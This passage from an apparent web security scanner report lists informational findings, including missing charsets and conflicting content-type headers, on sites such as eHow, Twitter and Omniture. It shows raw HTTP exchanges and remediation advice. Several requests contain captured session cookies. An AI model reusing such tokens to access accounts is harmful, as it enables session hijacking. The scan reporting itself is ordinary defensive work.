25.18. https://leads.demandbase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://leads.demandbase.com
Path:	/

Request

GET / HTTP/1.1
Host: leads.demandbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=236660194602537908;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:21:01 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-8+etch6
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html; charset=UTF-8

Hmm.

25.19. https://login.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/ajax/intl/language_dialog.php

Request

Response

25.20. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.21. https://maps-api-ssl.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps/api/js

Request

GET /maps/api/js HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Wed, 02 Feb 2011 15:34:07 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

25.22. https://my.omniture.com/login/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/login/

Request

Response

25.23. https://my.omniture.com/p/suite/1.2/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/p/suite/1.2/index.html

Request

Response

25.24. https://my.omniture.com/p/suite/current/authentication/get_login_domain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/p/suite/current/authentication/get_login_domain.html

Request

GET /p/suite/current/authentication/get_login_domain.html HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:21:09 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www457
Content-Length: 0
Content-Type: text/html
Connection: close

25.25. https://my.omniture.com/password_recovery.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/password_recovery.html

Request

GET /password_recovery.html HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:31:59 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www454
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26376

<html>
   <head>
       <title>Password Recovery</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <!-- <link href="https://my.omniture.com/includes/styles.css" type="text/css"
...[SNIP]...

25.26. https://my.omniture.com/support_popup_form.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/support_popup_form.html

Request

Response

25.27. https://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://picasaweb.google.com
Path:	/lh/view

Request

Response

25.28. https://publish.omniture.com/center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://publish.omniture.com
Path:	/center/

Request

Response

25.29. https://publish.omniture.com/center/util/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://publish.omniture.com
Path:	/center/util/

Request

Response

25.30. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:37:35 GMT
Connection: close

25.31. https://sitesearch.omniture.com/center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/

Request

Response

25.32. https://sitesearch.omniture.com/center/util/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/util/

Request

Response

25.33. https://trustseal.verisign.com/getseal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trustseal.verisign.com
Path:	/getseal

Request

GET /getseal HTTP/1.1
Host: trustseal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 15:42:20 GMT
Connection: close

25.34. https://trustsealinfo.verisign.com/splash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trustsealinfo.verisign.com
Path:	/splash

Request

GET /splash?dn=www.ehow.com&lang=en HTTP/1.1
Host: trustsealinfo.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:42:23 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 8074
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head profile="http://microformats.org/profile/hcard">
<title>VeriSign Trust Seal</title>
<link rel="stylesheet" type="text/css" href="style/splash
...[SNIP]...

25.35. https://twitter.com/jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/jobs

Request

GET /jobs HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:48 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 02 Feb 2011 01:53:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12029
Cache-Control: max-age=300
Expires: Wed, 02 Feb 2011 16:28:48 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Jobs a
...[SNIP]...

25.36. https://twitter.com/oexchange.xrd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/oexchange.xrd

Request

GET /oexchange.xrd HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 02 Feb 2011 02:39:19 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 760
Cache-Control: max-age=86400
Expires: Thu, 03 Feb 2011 16:23:49 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<?xml version='1.0' encoding='UTF-8'?>
<XRD xmlns='http://docs.oasis-open.org/ns/xri/xrd-1.0'>
<Subject>http://twitter.com</Subject>
<Property type='http://www.oexchange.org/spec/0.8/prop/vendor'>
...[SNIP]...

25.37. https://www.astaro.com/design/en/images/icons/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/design/en/images/icons/favicon.ico

Request

GET /design/en/images/icons/favicon.ico HTTP/1.1
Host: www.astaro.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; session_start_time=1296568531414; k_visit=2; push_time_start=1296569531420; has_js=1; __unam=fa38af9-12dddaf19a7-13ff2714-3; __utma=112476180.1215039085.1296493738.1296504424.1296568533.3; __utmc=112476180; __utmb=112476180.3.10.1296568533; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.4.10.1296568533; s_cc=true; s_sq=%5B%5BB%5D%5D; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:55:59 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 05 Dec 2008 08:20:36 GMT
ETag: "1aa02b-e36-5a02bd00"
Accept-Ranges: bytes
Content-Length: 3638
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

..............h...&... ..............(....... ...........@........................... |......V........Z......r...;........m..............I...............c...-....e.......p......3.......L........v....
...[SNIP]...

25.38. https://www.ehow.com/account/facebook_merge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/account/facebook_merge.aspx

Request

GET /account/facebook_merge.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5896

<!DOCTYPE html>
<html>
<head>
   <title>Connecting via Facebook</title>

       <link rel="stylesheet" type="text/css" href="https://www.ehow.com/content/compressed/en-US/common-kvgh0g.css"/>

       <li
...[SNIP]...

25.39. https://www.ehow.com/account/simple_login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/account/simple_login.aspx

Request

Response

25.40. https://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/account/simple_register.aspx

Request

Response

25.41. https://www.ehow.com/ajax/loginbyfacebookid.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/ajax/loginbyfacebookid.aspx

Request

GET /ajax/loginbyfacebookid.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2

25.42. https://www.ehow.com/forms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/

Request

Response

25.43. https://www.ehow.com/forms/PasswordRetrieval.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/PasswordRetrieval.aspx

Request

Response

25.44. https://www.ehow.com/forms/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/signin.aspx

Request

Response

25.45. https://www.ehow.com/privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/privacy.aspx

Request

GET /privacy.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

25.46. https://www.ehow.com/terms_use.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/terms_use.aspx

Request

GET /terms_use.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

25.47. https://www.ehow.com/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/xd_receiver.htm

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Content-Length: 264
Content-Type: text/html
Content-Location: http://www.ehow.com/xd_receiver.htm
Last-Modified: Tue, 17 Aug 2010 04:48:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Date: Wed, 02 Feb 2011 15:45:18 GMT
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<body>
<script src="http://conn
...[SNIP]...

26. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sr2.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: application/x-javascript
Content-Type: text/html

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /visitor/addons/deploy.asp?site=15744040&d_id=hotel-obtz HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
max-age: 1800
Last-Modified: Tue, 14 Jul 2009 12:04:47 GMT
Content-Type: application/x-javascript
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: public, max-age=38859
Date: Tue, 01 Feb 2011 15:24:15 GMT
Connection: close
Content-Length: 20

lpAddMonitorTag();

27. HTML does not specify charset previous next
There are 72 instances of this issue:

http://a0.twimg.com/a/1296609216/stylesheets/fronts.css
http://a0.twimg.com/profile_images/1160091262/science100x100_normal.jpg
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24
http://ad.doubleclick.net/adi/N3285.google/B2343920.91
http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5
http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5
http://ad.doubleclick.net/adi/dmd.ehow/computers
http://ad.doubleclick.net/adi/dmd.ehow/homepage
http://ad.doubleclick.net/clk
http://ad.yieldmanager.com/iframe3
https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js
https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html
http://amihackerproof.com/
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://dillerdesign.com/experiment/DD_belatedPNG/
http://ds.addthis.com/red/psi/p.json
http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json
http://fast.dm.demdex.net/dm-dest.html
http://hit.clickaider.com/pv
http://hostedusa3.whoson.com/
http://hostedusa3.whoson.com/include.js
http://hostedusa3.whoson.com/invite.js
http://hostedusa3.whoson.com/poll.gif
http://hostedusa3.whoson.com/stat.gif
http://jqueryui.com/about
http://kona10.kontera.com/
http://kona5.kontera.com/favicon.ico
http://local.msn.com/ten-day.aspx
http://local.msn.com/weather.aspx
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://pixel.invitemedia.com/data_sync
http://r.nexac.com/e/getdata.xgi
http://seg.sharethis.com/getSegment.php
http://showads.pubmatic.com/AdServer/AdServerServlet
http://sr2.liveperson.net/visitor/addons/deploy.asp
https://trustsealinfo.verisign.com/splash
http://uac.advertising.com/wrapper/aceUACping.htm
http://wp-superslider.com/index.php
http://www.amihackerproof.com/
http://www.autocheck.com/
http://www.dillerdesign.com/experiment/DD_belatedPNG/
http://www.ehow.co.uk/
http://www.ehow.com/xd_receiver.htm
https://www.ehow.com/xd_receiver.htm
http://www.google.com/instant/
http://www.google.com/intl/en/about.html
http://www.google.com/intl/en/ads/
http://www.google.com/intl/en/options/
http://www.opinionlab.com/ozone/24-7.asp
http://www.orbitz.com/App/ViewDHTMLCalendar
http://www.orbitz.com/App/ViewTravelWatchHome
http://www.orbitz.com/cacheable/ad.html
http://www.orbitz.com/cacheable/ad_empty.html
http://www.orbitz.com/cacheable/empty.html
http://www.orbitz.com/shared/adserverProxy.jsp
https://www.orbitz.com/Secure/ViewSecureCalendar
http://www.ppcse.net/
http://www.robtex.com/ext/ads/nb728.html
http://www.robtex.com/ext/ads/nt728.html
http://www.stocktrader.org.uk/remote2/ST1-
http://www.stocktrader.org.uk/remote2/ST1-1.php
http://www.stocktrader.org.uk/remote2/ST1-2.php
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw
http://www.wizzsurf.com/
http://www.worldmastiffforum.com/favicon.ico
http://xss-proxy.sourceforge.net/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

27.1. http://a0.twimg.com/a/1296609216/stylesheets/fronts.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a0.twimg.com
Path:	/a/1296609216/stylesheets/fronts.css

Request

Response

27.2. http://a0.twimg.com/profile_images/1160091262/science100x100_normal.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a0.twimg.com
Path:	/profile_images/1160091262/science100x100_normal.jpg

Request

GET /profile_images/1160091262/science100x100_normal.jpg HTTP/1.1
Host: a0.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Wed, 02 Feb 2011 16:19:47 GMT
Content-Type: text/html
Content-Length: 789
Expires: Wed, 02 Feb 2011 16:19:47 GMT
Connection: close

<HTML><HEAD>
<TITLE>ERROR: The requested URL could not be retrieved</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The requested URL could not be retrieved</H2>
<HR>
<P>
While trying to retrieve the URL:
<A
...[SNIP]...

27.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Request

